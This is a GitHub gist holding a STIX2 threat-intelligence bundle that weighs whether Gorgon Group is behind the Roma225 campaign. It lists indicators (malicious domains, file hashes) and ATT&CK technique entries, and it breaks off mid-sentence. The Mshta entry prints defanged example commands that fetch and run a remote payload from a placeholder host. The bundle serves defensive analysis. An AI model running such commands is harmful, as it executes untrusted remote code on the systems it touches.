Skip to content

Instantly share code, notes, and snippets.

@traut

traut/hypothesis-STIX2.json

Forked from CaitlinHuey/hypothesis-STIX2.json
Created February 29, 2024 14:50
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save traut/3124a81f9d4b2cbf29cd39bce2afbdee to your computer and use it in GitHub Desktop.
Save traut/3124a81f9d4b2cbf29cd39bce2afbdee to your computer and use it in GitHub Desktop.
Download ZIP
Representing a structured Hypothesis (STIX2) - co-authored by Sergey Polzunov
Raw
hypothesis-STIX2.json
{
"objects": [
{
"labels": [
"source--eiq-fusion"
],
"name": "EclecticIQ Fusion Center",
"external_references": [
{
"source_name": "external-url",
"url": "https:\/\/www.eclecticiq.com\/fusion-center"
}
],
"object_marking_refs": [
"marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
],
"created": "2019-01-14T10:09:52.963Z",
"identity_class": "organization",
"sectors": [
"cyber-threat-intelligence"
],
"id": "identity--f431f809-377b-45e0-aa1c-6a4751cae5ff",
"type": "identity",
"modified": "2019-03-06T12:13:36.090Z"
},
{
"id": "x-eclecticiq-hypothesis--f26abb1d-1fc9-488a-97da-cfd45b7717a0",
"created_by_ref": "identity--f431f809-377b-45e0-aa1c-6a4751cae5ff",
"labels": [
"source--eiq-fusion"
],
"object_refs": [
"campaign--1237e349-a7b1-4c44-bbc2-bab93b96a831",
"threat-actor--eacd6e7c-b826-4293-abe1-361c1a26a675"
],
"created": "2019-01-27T21:15:21.001Z",
"object_marking_refs": [
"marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
],
"name": "Gorgon Group is associated with Roma225 Campaign",
"description": "Similar attack patterns, hsitorical activity, use of same malware",
"x_eclecticiq_alternative_hypothesis_refs": [
"x-eclecticiq-hypothesis--38b61755-62f8-440f-97fc-613d04ce8a87"
],
"x_eclecticiq_weight_score": "low",
"type": "x-eclecticiq-hypothesis",
"modified": "2019-02-20T12:12:31.309Z"
},
{
"id": "relationship--4d850df6-5665-4233-b225-f7b5907da52e",
"type": "relationship",
"relationship_type": "x-evidence-of",
"created": "2019-02-20T12:12:31.309Z",
"modified": "2019-02-20T12:12:31.309Z",
"source_ref": "attack-pattern--e1a3c8e6-8880-5001-938c-45f05978900b",
"target_ref": "x-eclecticiq-hypothesis--f26abb1d-1fc9-488a-97da-cfd45b7717a0",
"description": "RevengeRAT seen in Roma225",
"created_by_ref": "identity--f431f809-377b-45e0-aa1c-6a4751cae5ff",
"x_eclecticiq_evidence_type": "secondary-source",
"x_eclecticiq_relevance": 7,
"x_eclecticiq_credibility": 10,
"external_references": [
{
"source_name": "external-url",
"url": "https:\/\/blog.yoroi.company\/research\/the-enigmatic-roma225-campaign\/"
}
],
"object_marking_refs": [
"marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
]
},
{
"id": "relationship--91250d8c-c7d3-4885-a1d5-1fd62108fc25",
"type": "relationship",
"relationship_type": "x-evidence-of",
"created": "2019-02-20T12:12:31.309Z",
"modified": "2019-02-20T12:12:31.309Z",
"source_ref": "indicator--5b46ea0b-0763-59e2-b169-2a32718a1214",
"target_ref": "x-eclecticiq-hypothesis--f26abb1d-1fc9-488a-97da-cfd45b7717a0",
"description": "usage of shared infrastructure",
"created_by_ref": "identity--f431f809-377b-45e0-aa1c-6a4751cae5ff",
"x_eclecticiq_evidence_type": "secondary-source",
"x_eclecticiq_relevance": 7,
"x_eclecticiq_credibility": 3,
"external_references": [
{
"source_name": "external-url",
"url": "https:\/\/blog.yoroi.company\/research\/the-enigmatic-roma225-campaign\/"
}
],
"object_marking_refs": [
"marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
]
},
{
"id": "x-eclecticiq-hypothesis--38b61755-62f8-440f-97fc-613d04ce8a87",
"created_by_ref": "identity--f431f809-377b-45e0-aa1c-6a4751cae5ff",
"labels": [
"source--eiq-fusion"
],
"created": "2019-01-27T21:15:21.001Z",
"object_marking_refs": [
"marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
],
"object_refs": [
"campaign--1237e349-a7b1-4c44-bbc2-bab93b96a831"
],
"name": "Gorgon Group is not associated with Roma225 Campaign",
"description": "Not enough evidence that supports that Gorgon Group is behind Roma225",
"x_eclecticiq_alternative_hypothesis_refs": [
"x-eclecticiq-hypothesis--f26abb1d-1fc9-488a-97da-cfd45b7717a0"
],
"x_eclecticiq_weight_score": "high",
"type": "x-eclecticiq-hypothesis",
"modified": "2019-02-20T12:12:31.309Z"
},
{
"id": "relationship--c82c8b90-cb52-415d-a993-81c40b993a1d",
"type": "relationship",
"relationship_type": "x-evidence-of",
"created": "2019-02-20T12:12:31.309Z",
"modified": "2019-02-20T12:12:31.309Z",
"source_ref": "attack-pattern--e1a3c8e6-8880-5001-938c-45f05978900b",
"target_ref": "x-eclecticiq-hypothesis--38b61755-62f8-440f-97fc-613d04ce8a87",
"description": "MSHTA.exe not used by Gorgon Group before",
"created_by_ref": "identity--f431f809-377b-45e0-aa1c-6a4751cae5ff",
"x_eclecticiq_evidence_type": "secondary-source",
"x_eclecticiq_relevance": 10,
"x_eclecticiq_credibility": 9,
"external_references": [
{
"source_name": "external-url",
"url": "https:\/\/blog.yoroi.company\/research\/the-enigmatic-roma225-campaign\/"
}
],
"object_marking_refs": [
"marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
]
},
{
"id": "relationship--c7d5c470-8009-4fa8-8a6f-e647e71054bf",
"type": "relationship",
"relationship_type": "x-evidence-of",
"created": "2019-02-20T12:12:31.309Z",
"modified": "2019-02-20T12:12:31.309Z",
"source_ref": "malware--46142e30-38e6-5c0e-b2e4-ffcfbc443426",
"target_ref": "x-eclecticiq-hypothesis--38b61755-62f8-440f-97fc-613d04ce8a87",
"description": "RevengeRAT not excusively used by Gorgon Group",
"created_by_ref": "identity--f431f809-377b-45e0-aa1c-6a4751cae5ff",
"x_eclecticiq_evidence_type": "secondary-source",
"x_eclecticiq_relevance": 10,
"x_eclecticiq_credibility": 9,
"external_references": [
{
"source_name": "Unit42"
}
],
"object_marking_refs": [
"marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
]
},
{
"id": "relationship--ff1d0e39-50cb-4e70-b6f9-c462e7576698",
"type": "relationship",
"relationship_type": "x-evidence-of",
"created": "2019-02-20T12:12:31.309Z",
"modified": "2019-02-20T12:12:31.309Z",
"source_ref": "indicator--5b46ea0b-0763-59e2-b169-2a32718a1214",
"target_ref": "x-eclecticiq-hypothesis--38b61755-62f8-440f-97fc-613d04ce8a87",
"description": "DDNS and use of Blogspot does not allign with Gorgon Group Infrastructure",
"created_by_ref": "identity--f431f809-377b-45e0-aa1c-6a4751cae5ff",
"x_eclecticiq_evidence_type": "secondary-source",
"x_eclecticiq_relevance": 10,
"x_eclecticiq_credibility": 9,
"external_references": [
{
"source_name": "Unit42"
}
],
"object_marking_refs": [
"marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
]
},
{
"id": "relationship--0d88fa85-ac8e-4a9a-b2f6-25b64fa7a711",
"type": "relationship",
"relationship_type": "x-evidence-of",
"created": "2019-02-20T12:12:31.309Z",
"modified": "2019-02-20T12:12:31.309Z",
"source_ref": "indicator--2244ef43-6919-4f57-96ad-a25c4f9a79aa",
"target_ref": "x-eclecticiq-hypothesis--38b61755-62f8-440f-97fc-613d04ce8a87",
"description": "DDNS and use of Blogspot does not allign with Gorgon Group Infrastructure",
"created_by_ref": "identity--f431f809-377b-45e0-aa1c-6a4751cae5ff",
"x_eclecticiq_evidence_type": "secondary-source",
"x_eclecticiq_relevance": 10,
"x_eclecticiq_credibility": 9,
"external_references": [
{
"source_name": "Unit42"
}
],
"object_marking_refs": [
"marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
]
},
{
"id": "report--5c3873b2-709e-42be-8da5-9b09da0f7236",
"name": "Some report about with some conclusions",
"labels": [
"theme--generic-threats",
"source--eiq-fusion"
],
"published": "2019-01-27T21:13:07.241081Z",
"created": "2019-01-27T21:13:07.241Z",
"description": "smart analysis",
"object_marking_refs": [
"marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
],
"object_refs": [
"x-eclecticiq-hypothesis--f26abb1d-1fc9-488a-97da-cfd45b7717a0",
"x-eclecticiq-hypothesis--38b61755-62f8-440f-97fc-613d04ce8a87",
"campaign--1237e349-a7b1-4c44-bbc2-bab93b96a831"
],
"type": "report",
"modified": "2019-02-20T12:12:31.329Z"
},
{
"id": "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9",
"definition_type": "tlp",
"definition": {
"tlp": "white"
},
"type": "marking-definition",
"created": "2019-03-06T12:13:36.058Z"
},
{
"id": "indicator--e1a3c8e6-8880-5001-938c-45f05978900b",
"labels": [
"observables",
"theme--generic-threats",
"kill-chain-phase--installation",
"admiralty-code--fairly-reliable",
"threat-actors--espionage",
"malware--dropper",
"theme--apt",
"source--eiq-fusion",
"admiralty-code--probably-true",
"industry-sector--automotive",
"theme--financial-crime",
"theme--critical-infrastructure"
],
"pattern": "[file:name = '.ppa' AND file:name = 'mshta.exe' AND url:value = 'https:\/\/minhacasaminhavidacdt.blogspot.com\/' AND domain-name:value = 'minhacasaminhavidacdt.blogspot.com']",
"valid_from": "2018-12-27T05:00:00Z",
"name": "Indicator for \"Attack Pattern: Macro code in.ppa file invokes mshta.exe tool to download and execute next-stage of the dropper\"",
"created": "2019-01-14T10:09:52.963Z",
"type": "indicator",
"modified": "2019-03-06T12:13:36.059Z"
},
{
"id": "indicator--ef97960a-a76e-5009-91d4-a11bfcddd4c0",
"labels": [
"observables",
"admiralty-code--fairly-reliable",
"threat-actors--espionage",
"theme--apt",
"source--eiq-fusion",
"industry-sector--automotive",
"admiralty-code--probably-true",
"theme--financial-crime",
"theme--critical-infrastructure"
],
"pattern": "[country-code:value = 'IT' AND industry:value = 'Automotive' AND name:value = 'italian automotive companies' AND country:value = 'Italy']",
"valid_from": "2018-12-27T05:00:00Z",
"name": "Indicator for \"Targeted Victim: Italian Automotive companies\"",
"created": "2019-01-14T10:09:52.963Z",
"type": "indicator",
"modified": "2019-03-06T12:13:36.079Z"
},
{
"id": "indicator--a3bfb553-ee1d-53e8-9dc7-b0ebf12bdc5f",
"labels": [
"observables",
"kill-chain-phase--installation",
"admiralty-code--fairly-reliable",
"admiralty-code--probably-true",
"industry-sector--automotive",
"threat-actors--espionage",
"malware--remote-access-trojan",
"theme--critical-infrastructure",
"theme--generic-threats",
"source--eiq-fusion",
"kill-chain--target-manipulation--weaponization",
"theme--financial-crime",
"theme--apt"
],
"pattern": "[url:value = 'https:\/\/minhacasaminhavidacdt.blogspot.com\/' AND domain-name:value = 'minhacasaminhavidacdt.blogspot.com']",
"valid_from": "2018-12-27T05:00:00Z",
"name": "Indicator for \"Attack Pattern: Install a RevengeRAT variant and execute a series of malicious actions\"",
"created": "2019-02-23T16:30:24.836Z",
"type": "indicator",
"modified": "2019-03-06T12:13:36.084Z"
},
{
"id": "indicator--46142e30-38e6-5c0e-b2e4-ffcfbc443426",
"labels": [
"observables",
"admiralty-code--confirmed-by-other-sources",
"admiralty-code--completely-reliable",
"theme--generic-threats",
"theme--apt",
"industry-sector--government-national",
"source--eiq-fusion",
"industry-sector--defense",
"malware--remote-access-trojan",
"theme--critical-infrastructure",
"threat-actors--apt"
],
"pattern": "[malware:value = 'revengerat']",
"valid_from": "2018-11-13T16:08:55.483257Z",
"name": "Indicator for \"Malware: RevengeRAT\"",
"created": "2018-11-13T17:07:33.945Z",
"type": "indicator",
"modified": "2019-03-06T12:13:36.087Z"
},
{
"labels": [
"theme--generic-threats",
"kill-chain-phase--installation",
"admiralty-code--fairly-reliable",
"threat-actors--espionage",
"malware--dropper",
"theme--apt",
"source--eiq-fusion",
"admiralty-code--probably-true",
"industry-sector--automotive",
"theme--financial-crime",
"theme--critical-infrastructure"
],
"name": "Attack Pattern: Macro code in.ppa file invokes mshta.exe tool to download and execute next-stage of the dropper",
"external_references": [
{
"source_name": "mitre-attack",
"external_id": "1170",
"description": "Mshta "
},
{
"source_name": "external-url",
"url": "https:\/\/blog.yoroi.company\/research\/the-enigmatic-roma225-campaign\/"
}
],
"object_marking_refs": [
"marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
],
"description": "<p> <\/p><p>The macro code in the .ppa file contains a simple instruction invoking the \u201cmshta.exe\u201d tool to download and execute the next-stage of the dropper retrieved from \u201c<em>hxxps:\/\/minhacasaminhavidacdt.blogspot[.]com\/\u201d.<\/em><\/p><p> <\/p>",
"created": "2019-01-14T10:09:52.963Z",
"id": "attack-pattern--e1a3c8e6-8880-5001-938c-45f05978900b",
"x_eclecticiq_meta": {
"estimated_observed_time": "2018-12-27T05:00:00+00:00",
"estimated_threat_start_time": "2018-12-27T05:00:00+00:00",
"half_life": 100,
"ingest_time": "2018-12-31T14:45:10.412696+00:00",
"source_reliability": "A",
"tags": [
],
"taxonomy_paths": [
[
"Theme",
"Theme - Generic Threats"
],
[
"Kill Chain Phases",
"Kill chain phase - Installation"
],
[
"Admiralty Code",
"Admiralty Code - Reliability",
"Admiralty Code - Fairly reliable"
],
[
"Threat Actors",
"Threat Actors - Espionage"
],
[
"Malware ",
"Malware - Dropper"
],
[
"Theme",
"Theme - APT"
],
[
"Source",
"Source - EIQ Fusion"
],
[
"Admiralty Code",
"Admiralty Code - Credibility",
"Admiralty Code - Probably True"
],
[
"Industry Sector",
"Industry Sector - Automotive"
],
[
"Theme",
"Theme - Financial Crime"
],
[
"Theme",
"Theme - Critical Infrastructure"
]
],
"title": "Attack Pattern: Macro code in.ppa file invokes mshta.exe tool to download and execute next-stage of the dropper",
"tlp_color": "WHITE"
},
"x_eclecticiq_stix1_id": "{https:\/\/www.eclecticiq.com\/ns}ttp-e2a97bd8-03ac-4080-be45-cc4356a6aae6",
"type": "attack-pattern",
"modified": "2019-03-06T12:13:36.089Z"
},
{
"labels": [
"admiralty-code--confirmed-by-other-sources",
"admiralty-code--completely-reliable",
"source--eiq-fusion",
"theme--critical-infrastructure",
"targeted-technology--windows",
"theme--apt",
"source--mitre",
"source-type--open-source",
"theme--generic-threats"
],
"name": "Technique\/T1170: Mshta",
"object_marking_refs": [
"marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
],
"description": "Mshta.exe is a utility that executes Microsoft HTML Applications (HTA). HTA files have the file extension <code>.hta<\/code>. HTAs are standalone applications that execute using the same models and technologies of Internet Explorer, but outside of the browser.\n\nAdversaries can use mshta.exe to proxy execution of malicious .hta files and Javascript or VBScript through a trusted Windows utility. There are several examples of different types of threats leveraging mshta.exe during initial compromise and for execution of code \n\nFiles may be executed by mshta.exe through an inline script: <code>mshta vbscript:Close(Execute(\"GetObject(\"\"script:https[:]\/\/webserver\/payload[.]sct\"\")\"))<\/code>\n\nThey may also be executed directly from URLs: <code>mshta http[:]\/\/webserver\/payload[.]hta<\/code>\n\nMshta.exe can be used to bypass application whitelisting solutions that do not account for its potential use. Since mshta.exe executes outside of the Internet Explorer's security context, it also bypasses browser security settings.",
"created": "2019-03-06T12:07:27.250Z",
"id": "attack-pattern--6ecf2333-f55c-51dd-b5c8-0b678b65ffeb",
"x_eclecticiq_meta": {
"estimated_observed_time": "2018-05-15T15:17:03.413053+00:00",
"estimated_threat_start_time": "2018-05-15T15:17:03.413053+00:00",
"half_life": 9000,
"ingest_time": "2018-05-15T15:17:03.413053+00:00",
"source_reliability": "A",
"taxonomy_paths": [
[
"Admiralty Code",
"Admiralty Code - Credibility",
"Admiralty Code - Confirmed by other sources"
],
[
"Admiralty Code",
"Admiralty Code - Reliability",
"Admiralty Code - Completely reliable"
],
[
"Source",
"Source - EIQ Fusion"
],
[
"Theme",
"Theme - Critical Infrastructure"
],
[
"Targeted Technology",
"Targeted Technology - Operating Systems",
"Targeted Technology - Windows"
],
[
"Theme",
"Theme - APT"
],
[
"Source",
"Source - Mitre"
],
[
"Source Type",
"Source Type - Open Source"
],
[
"Theme",
"Theme - Generic Threats"
]
],
"title": "Technique\/T1170: Mshta",
"tlp_color": "WHITE"
},
"x_eclecticiq_stix1_id": "{https:\/\/attack.mitre.org}ttp-65ae5301-b7ce-5451-a730-cbdecc1b8ca2",
"type": "attack-pattern",
"modified": "2019-03-06T12:13:36.090Z"
},
{
"labels": [
"admiralty-code--fairly-reliable",
"threat-actors--espionage",
"theme--apt",
"source--eiq-fusion",
"industry-sector--automotive",
"admiralty-code--probably-true",
"theme--financial-crime",
"theme--critical-infrastructure"
],
"name": "Targeted Victim: Italian Automotive companies",
"external_references": [
{
"source_name": "external-url",
"url": "https:\/\/blog.yoroi.company\/research\/the-enigmatic-roma225-campaign\/"
}
],
"object_marking_refs": [
"marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
],
"created": "2019-01-14T10:09:52.963Z",
"identity_class": "class",
"sectors": [
"automotive"
],
"id": "identity--ef97960a-a76e-5009-91d4-a11bfcddd4c0",
"x_eclecticiq_meta": {
"estimated_observed_time": "2018-12-27T05:00:00+00:00",
"estimated_threat_start_time": "2018-12-27T05:00:00+00:00",
"half_life": 100,
"ingest_time": "2018-12-31T14:28:12.542810+00:00",
"source_reliability": "A",
"tags": [
],
"taxonomy_paths": [
[
"Admiralty Code",
"Admiralty Code - Reliability",
"Admiralty Code - Fairly reliable"
],
[
"Threat Actors",
"Threat Actors - Espionage"
],
[
"Theme",
"Theme - APT"
],
[
"Source",
"Source - EIQ Fusion"
],
[
"Industry Sector",
"Industry Sector - Automotive"
],
[
"Admiralty Code",
"Admiralty Code - Credibility",
"Admiralty Code - Probably True"
],
[
"Theme",
"Theme - Financial Crime"
],
[
"Theme",
"Theme - Critical Infrastructure"
]
],
"title": "Targeted Victim: Italian Automotive companies",
"tlp_color": "WHITE"
},
"x_eclecticiq_stix1_id": "{https:\/\/www.eclecticiq.com\/ns}ttp-bd3c10b8-0abe-480d-b68e-4c889b03c153",
"type": "identity",
"modified": "2019-03-06T12:13:36.090Z"
},
{
"labels": [
"admiralty-code--completely-reliable",
"admiralty-code--confirmed-by-other-sources",
"theme--generic-threats",
"source-type--open-source",
"source--mitre",
"source--eiq-fusion"
],
"name": "Technique\/PRE-T1123: Obtain\/re-use payloads",
"object_marking_refs": [
"marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
],
"description": "A payload is the part of the malware which performs a malicious action. The adversary may re-use payloads when the needed capability is already available.SonyDestover",
"created": "2018-11-28T16:31:04.008Z",
"id": "attack-pattern--6ed91203-7f3a-57db-a115-e2ebc5ca1943",
"x_eclecticiq_meta": {
"estimated_observed_time": "2018-05-15T15:14:40.036805+00:00",
"estimated_threat_start_time": "2018-05-15T15:14:40.036805+00:00",
"half_life": 9000,
"ingest_time": "2018-05-15T15:14:40.036805+00:00",
"source_reliability": "A",
"taxonomy_paths": [
[
"Admiralty Code",
"Admiralty Code - Reliability",
"Admiralty Code - Completely reliable"
],
[
"Admiralty Code",
"Admiralty Code - Credibility",
"Admiralty Code - Confirmed by other sources"
],
[
"Theme",
"Theme - Generic Threats"
],
[
"Source Type",
"Source Type - Open Source"
],
[
"Source",
"Source - Mitre"
],
[
"Source",
"Source - EIQ Fusion"
]
],
"title": "Technique\/PRE-T1123: Obtain\/re-use payloads",
"tlp_color": "WHITE"
},
"x_eclecticiq_stix1_id": "{https:\/\/attack.mitre.org}ttp-cf03aa28-3049-5c9e-8c55-0e9a34fdb2a3",
"type": "attack-pattern",
"modified": "2019-03-06T12:13:36.090Z"
},
{
"id": "indicator--24bb51ea-2fb9-587a-86e8-7b0f34e013ae",
"labels": [
"admiralty-code--fairly-reliable",
"theme--generic-threats",
"threat-actors--espionage",
"theme--apt",
"malware--dropper",
"source--eiq-fusion",
"industry-sector--automotive",
"admiralty-code--probably-true",
"theme--critical-infrastructure"
],
"pattern": "[url:value = 'https:\/\/minhacasaminhavidacdt.blogspot.com\/' AND domain-name:value = 'minhacasaminhavidacdt.blogspot.com']",
"valid_from": "2018-12-27T05:00:00Z",
"name": "https:\/\/minhacasaminhavidacdt.blogspot.com",
"created": "2019-01-08T11:36:45.187Z",
"object_marking_refs": [
"marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
],
"x_eclecticiq_meta": {
"estimated_observed_time": "2018-12-27T05:00:00+00:00",
"estimated_threat_start_time": "2018-12-27T05:00:00+00:00",
"half_life": 10,
"ingest_time": "2018-12-31T14:44:02.184058+00:00",
"source_reliability": "A",
"tags": [
],
"taxonomy_paths": [
[
"Admiralty Code",
"Admiralty Code - Reliability",
"Admiralty Code - Fairly reliable"
],
[
"Theme",
"Theme - Generic Threats"
],
[
"Threat Actors",
"Threat Actors - Espionage"
],
[
"Theme",
"Theme - APT"
],
[
"Malware ",
"Malware - Dropper"
],
[
"Source",
"Source - EIQ Fusion"
],
[
"Industry Sector",
"Industry Sector - Automotive"
],
[
"Admiralty Code",
"Admiralty Code - Credibility",
"Admiralty Code - Probably True"
],
[
"Theme",
"Theme - Critical Infrastructure"
]
],
"title": "https:\/\/minhacasaminhavidacdt.blogspot.com",
"tlp_color": "WHITE"
},
"x_eclecticiq_stix1_id": "{https:\/\/www.eclecticiq.com\/ns}indicator-5f07d138-c706-4bae-8978-966b3d660f97",
"type": "indicator",
"modified": "2019-03-06T12:13:36.091Z"
},
{
"id": "indicator--6880007b-2a92-56ef-becb-59973a1f8ad6",
"labels": [
"theme--generic-threats",
"threat-actors--espionage",
"theme--apt",
"malware--dropper",
"source--eiq-fusion",
"industry-sector--automotive",
"admiralty-code--probably-true",
"theme--critical-infrastructure",
"admiralty-code--usually-reliable"
],
"pattern": "[file:hashes.MD5 = 'cdb34c32c48c0f2dd387dbf277b4b8ce' AND file:hashes.'SHA-256' = 'e8a765ec824881e1e78defd7c011da735f3e3b954aaf93a4282b6455a1b9afcc']",
"valid_from": "2018-12-27T05:00:00Z",
"name": "e8a765ec824881e1e78defd7c011da735f3e3b954aaf93a4282b6455a1b9afcc",
"created": "2018-12-31T16:08:59.571Z",
"object_marking_refs": [
"marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
],
"x_eclecticiq_meta": {
"estimated_observed_time": "2018-12-27T05:00:00+00:00",
"estimated_threat_start_time": "2018-12-27T05:00:00+00:00",
"half_life": 10,
"ingest_time": "2018-12-31T15:58:16.842753+00:00",
"source_reliability": "A",
"tags": [
],
"taxonomy_paths": [
[
"Theme",
"Theme - Generic Threats"
],
[
"Threat Actors",
"Threat Actors - Espionage"
],
[
"Theme",
"Theme - APT"
],
[
"Malware ",
"Malware - Dropper"
],
[
"Source",
"Source - EIQ Fusion"
],
[
"Industry Sector",
"Industry Sector - Automotive"
],
[
"Admiralty Code",
"Admiralty Code - Credibility",
"Admiralty Code - Probably True"
],
[
"Theme",
"Theme - Critical Infrastructure"
],
[
"Admiralty Code",
"Admiralty Code - Reliability",
"Admiralty Code - Usually reliable"
]
],
"title": "e8a765ec824881e1e78defd7c011da735f3e3b954aaf93a4282b6455a1b9afcc",
"tlp_color": "WHITE"
},
"x_eclecticiq_stix1_id": "{https:\/\/www.eclecticiq.com\/ns}indicator-c9e3b4ae-80ca-4adc-82b1-20b8d25335fd",
"type": "indicator",
"modified": "2019-03-06T12:13:36.093Z"
},
{
"labels": [
"admiralty-code--confirmed-by-other-sources",
"admiralty-code--completely-reliable",
"source--eiq-fusion",
"theme--critical-infrastructure",
"theme--apt",
"source--mitre",
"source-type--open-source",
"theme--generic-threats"
],
"name": "Technique\/T1060: Registry Run Keys \/ Start Folder",
"object_marking_refs": [
"marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
],
"description": "Adding an entry to the \"run keys\" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. The program will be executed under the context of the user and will have the account's associated permissions level.\n\nAdversaries can use these configuration locations to execute malware, such as remote access tools, to maintain persistence through system reboots. Adversaries may also use [[Technique\/T1036|Masquerading]] to make the Registry entries look as if they are associated with legitimate programs.",
"created": "2019-03-06T12:07:27.250Z",
"id": "attack-pattern--07f560c1-ef9f-56cb-9682-ba3985e0a260",
"x_eclecticiq_meta": {
"estimated_observed_time": "2018-05-15T15:17:25.388530+00:00",
"estimated_threat_start_time": "2018-05-15T15:17:25.388530+00:00",
"half_life": 9000,
"ingest_time": "2018-05-15T15:17:25.388530+00:00",
"source_reliability": "A",
"taxonomy_paths": [
[
"Admiralty Code",
"Admiralty Code - Credibility",
"Admiralty Code - Confirmed by other sources"
],
[
"Admiralty Code",
"Admiralty Code - Reliability",
"Admiralty Code - Completely reliable"
],
[
"Source",
"Source - EIQ Fusion"
],
[
"Theme",
"Theme - Critical Infrastructure"
],
[
"Theme",
"Theme - APT"
],
[
"Source",
"Source - Mitre"
],
[
"Source Type",
"Source Type - Open Source"
],
[
"Theme",
"Theme - Generic Threats"
]
],
"title": "Technique\/T1060: Registry Run Keys \/ Start Folder",
"tlp_color": "WHITE"
},
"x_eclecticiq_stix1_id": "{https:\/\/attack.mitre.org}ttp-c90ef632-9082-5233-8ee5-c0427940df54",
"type": "attack-pattern",
"modified": "2019-03-06T12:13:36.101Z"
},
{
"id": "indicator--e676bc18-efa3-5a34-99e7-61a53d3e1f67",
"labels": [
"admiralty-code--fairly-reliable",
"theme--generic-threats",
"threat-actors--espionage",
"theme--apt",
"malware--dropper",
"source--eiq-fusion",
"industry-sector--automotive",
"admiralty-code--probably-true",
"theme--critical-infrastructure"
],
"pattern": "[url:value = 'http:\/\/cdtmaster.com.br\/' AND domain-name:value = 'cdtmaster.com.br']",
"valid_from": "2018-12-27T05:00:00Z",
"name": "http:\/\/cdtmaster.com.br",
"created": "2019-01-08T11:44:23.038Z",
"object_marking_refs": [
"marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
],
"x_eclecticiq_meta": {
"estimated_observed_time": "2018-12-27T05:00:00+00:00",
"estimated_threat_start_time": "2018-12-27T05:00:00+00:00",
"half_life": 10,
"ingest_time": "2018-12-31T15:24:42.762225+00:00",
"source_reliability": "A",
"tags": [
],
"taxonomy_paths": [
[
"Admiralty Code",
"Admiralty Code - Reliability",
"Admiralty Code - Fairly reliable"
],
[
"Theme",
"Theme - Generic Threats"
],
[
"Threat Actors",
"Threat Actors - Espionage"
],
[
"Theme",
"Theme - APT"
],
[
"Malware ",
"Malware - Dropper"
],
[
"Source",
"Source - EIQ Fusion"
],
[
"Industry Sector",
"Industry Sector - Automotive"
],
[
"Admiralty Code",
"Admiralty Code - Credibility",
"Admiralty Code - Probably True"
],
[
"Theme",
"Theme - Critical Infrastructure"
]
],
"title": "http:\/\/cdtmaster.com.br",
"tlp_color": "WHITE"
},
"x_eclecticiq_stix1_id": "{https:\/\/www.eclecticiq.com\/ns}indicator-a32f0b25-0382-4b0d-9ebf-c863bfc995b6",
"type": "indicator",
"modified": "2019-03-06T12:13:36.102Z"
},
{
"id": "indicator--cc6fe40d-af7d-5a9c-bde1-b151101f5c1d",
"labels": [
"theme--generic-threats",
"threat-actors--espionage",
"theme--apt",
"malware--dropper",
"source--eiq-fusion",
"industry-sector--automotive",
"admiralty-code--probably-true",
"theme--critical-infrastructure",
"admiralty-code--usually-reliable"
],
"pattern": "[file:hashes.'SHA-256' = '702e5cc9462e464c8c29c832fe0d1ecd5cd7740cc2cbceecfd70e566da8194a1' AND file:hashes.MD5 = 'cdb34c32c48c0f2dd387dbf277b4b8ce']",
"valid_from": "2018-12-27T05:00:00Z",
"name": "702e5cc9462e464c8c29c832fe0d1ecd5cd7740cc2cbceecfd70e566da8194a1",
"created": "2018-12-31T16:08:59.571Z",
"object_marking_refs": [
"marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
],
"x_eclecticiq_meta": {
"estimated_observed_time": "2018-12-27T05:00:00+00:00",
"estimated_threat_start_time": "2018-12-27T05:00:00+00:00",
"half_life": 10,
"ingest_time": "2018-12-31T15:58:50.373637+00:00",
"source_reliability": "A",
"tags": [
],
"taxonomy_paths": [
[
"Theme",
"Theme - Generic Threats"
],
[
"Threat Actors",
"Threat Actors - Espionage"
],
[
"Theme",
"Theme - APT"
],
[
"Malware ",
"Malware - Dropper"
],
[
"Source",
"Source - EIQ Fusion"
],
[
"Industry Sector",
"Industry Sector - Automotive"
],
[
"Admiralty Code",
"Admiralty Code - Credibility",
"Admiralty Code - Probably True"
],
[
"Theme",
"Theme - Critical Infrastructure"
],
[
"Admiralty Code",
"Admiralty Code - Reliability",
"Admiralty Code - Usually reliable"
]
],
"title": "702e5cc9462e464c8c29c832fe0d1ecd5cd7740cc2cbceecfd70e566da8194a1",
"tlp_color": "WHITE"
},
"x_eclecticiq_stix1_id": "{https:\/\/www.eclecticiq.com\/ns}indicator-dcf359a2-2643-45b2-9b61-999addff3bbf",
"type": "indicator",
"modified": "2019-03-06T12:13:36.104Z"
},
{
"labels": [
"admiralty-code--confirmed-by-other-sources",
"admiralty-code--completely-reliable",
"source--eiq-fusion",
"targeted-technology--windows",
"theme--apt",
"source--mitre",
"source-type--open-source",
"theme--generic-threats"
],
"name": "Technique\/T1112: Modify Registry",
"object_marking_refs": [
"marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
],
"description": "Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in [[Persistence]] and [[Execution]].\n\nAccess to specific areas of the Registry depends on account permissions, some requiring administrator-level access. The built-in Windows command-line utility Reg may be used for local or remote Registry modification. Other tools may also be used, such as a remote access tool, which may contain functionality to interact with the Registry through the Windows API (see examples).\n\nThe Registry of a remote system may be modified to aid in execution of files as part of [[Lateral Movement]]. It requires the remote Registry service to be running on the target system. Often [[Technique\/T1078|Valid Accounts]] are required, along with access to the remote system's 